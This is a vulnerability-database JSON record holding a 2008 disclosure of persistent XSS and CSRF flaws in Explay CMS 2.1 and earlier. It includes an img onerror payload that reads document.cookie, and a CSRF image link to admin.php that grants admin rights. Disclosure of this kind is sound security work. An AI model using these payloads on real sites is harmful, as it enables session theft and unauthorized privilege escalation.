{"sourceData": "\n ==================================\r\nExplay CMS <= 2.1 Persistent XSS and CSRF\r\n==================================\r\nDiscovered by hodik\r\nMail: n.khodov@gmail.com\r\n\r\n1. Persistent XSS\r\nThis CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment <img src="http://google.com" onerror="alert(document.cookie)" />\r\n\r\n2. CSRF\r\nUser can get admin rights if admin open malicious page that contain, for instance:\r\n<img src="http://explay.localhost/admin.php?name=users&page=1&order=user_id&set_admin=2" />\r\nor merely insert it to comment or article text.\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9536", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-9536", "type": "seebug", "viewCount": 2, "references": [], "lastseen": "2017-11-19T21:26:37", "published": "2008-09-21T00:00:00", "cvelist": [], "id": "SSV:9536", "enchantments_done": [], "modified": "2008-09-21T00:00:00", "title": "Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647664226}}

{}